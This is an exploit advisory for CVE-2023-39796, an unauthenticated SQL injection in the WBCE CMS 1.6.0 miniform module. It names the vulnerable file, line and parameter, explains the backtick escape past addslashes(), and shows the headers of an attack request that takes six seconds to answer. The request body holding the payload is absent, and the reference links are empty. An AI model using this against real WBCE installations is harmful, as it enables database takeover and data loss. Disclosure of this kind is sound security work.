# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0  
# Date: 15.11.2023   
# Exploit Author: young pope   
# Vendor Homepage:   
# Software Link:   
# Version: 1.6.0   
# Tested on: Kali linux   
# CVE : CVE-2023-39796  
There is an sql injection vulnerability in *miniform* module which is a   
default module installed in the *WBCE* cms. It is an unauthenticated   
sqli so anyone could access it and takeover the whole database.  
In file /modules/miniform/ajax_delete_message.php there is no   
authentication check. On line |40| in this file, there is a |DELETE|   
query that is vulnerable, an attacker could jump from the query using   
tick sign - ```.  
Function |addslashes()|   
( escapes only   
these characters and not a tick sign:  
* single quote (')  
* double quote (")  
* backslash ()  
* NUL (the NUL byte  
The DB_RECORD_TABLE parameter is vulnerable.  
If an unauthenticated attacker send this request:  
POST /modules/miniform/ajax_delete_message.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,   
like Gecko) Chrome/36.0.1985.125 Safari/537.36  
Connection: close  
Content-Length: 162  
Accept: */*  
Accept-Language: en  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate  
The response is received after 6s.  
Reference links: